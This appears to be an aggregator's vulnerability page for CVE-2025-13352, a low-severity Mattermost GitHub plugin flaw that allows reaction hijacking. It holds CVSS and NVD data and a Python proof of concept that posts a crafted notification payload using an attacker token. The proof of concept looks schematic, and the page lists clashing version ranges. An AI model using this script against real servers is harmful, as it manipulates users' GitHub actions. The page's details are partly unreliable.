Security Vulnerability Report
CVE-2025-13352 CVSS 3.0 LOW

CVE-2025-13352

Published: 2025-12-17 13:15:57
Last Modified: 2025-12-29 18:50:48

Description

Mattermost versions 10.11.x <= 10.11.6 and Mattermost GitHub plugin versions <= 2.4.0 fail to validate the plugin bot identity in reaction forwarding, which allows attackers to hijack the GitHub reaction feature and make users add reactions to arbitrary GitHub objects via crafted notification posts.

CVSS Details

CVSS Score
3.0
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
Mattermost < 10.11.6
Mattermost 10.11.x <= 10.11.6
Mattermost GitHub Plugin < 2.4.0
Mattermost GitHub Plugin <= 2.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13352 PoC - Mattermost GitHub Plugin Reaction Hijacking
# This PoC demonstrates the reaction hijacking vulnerability
import requests
import json

TARGET_URL = "https://vulnerable-mattermost-server.com"
ATTACKER_TOKEN = "attacker_webhook_token"

MALICIOUS_PAYLOAD = {
    "type": "github_notification",
    "action": "reaction",
    "target": {
        "owner": "attacker-controlled-org",
        "repo": "malicious-repo",
        "issue_number": 1
    },
    "reaction_type": "thumbsup"
}


def exploit_reaction_hijacking():
    """
    Exploit steps:
    1. Send malicious notification to target user
    2. User views notification and clicks reaction button
    3. Plugin forwards reaction to GitHub without proper bot identity validation
    4. User's reaction is applied to attacker-controlled GitHub object
    """
    exploit_url = f"{TARGET_URL}/api/v4/posts"
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    response = requests.post(exploit_url, headers=headers, json={
        "channel_id": "target_user_channel",
        "message": "GitHub notification",
        "props": MALICIOUS_PAYLOAD
    })
    return response.status_code == 200


# Note: This PoC is for educational purposes only
# Actual exploitation requires authenticated access to Mattermost instance

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13352", "sourceIdentifier": "[email protected]", "published": "2025-12-17T13:15:56.627", "lastModified": "2025-12-29T18:50:47.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.6 and Mattermost GitHub plugin versions <=2.4.0 fail to validate plugin bot identity in reaction forwarding which allows attackers to hijack the GitHub reaction feature to make users add reactions to arbitrary GitHub objects via crafted notification posts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N", "baseScore": 3.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.7", "matchCriteriaId": "EB4AD9AE-B2DB-4D49-87AD-FA5F9CE6A0C8"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}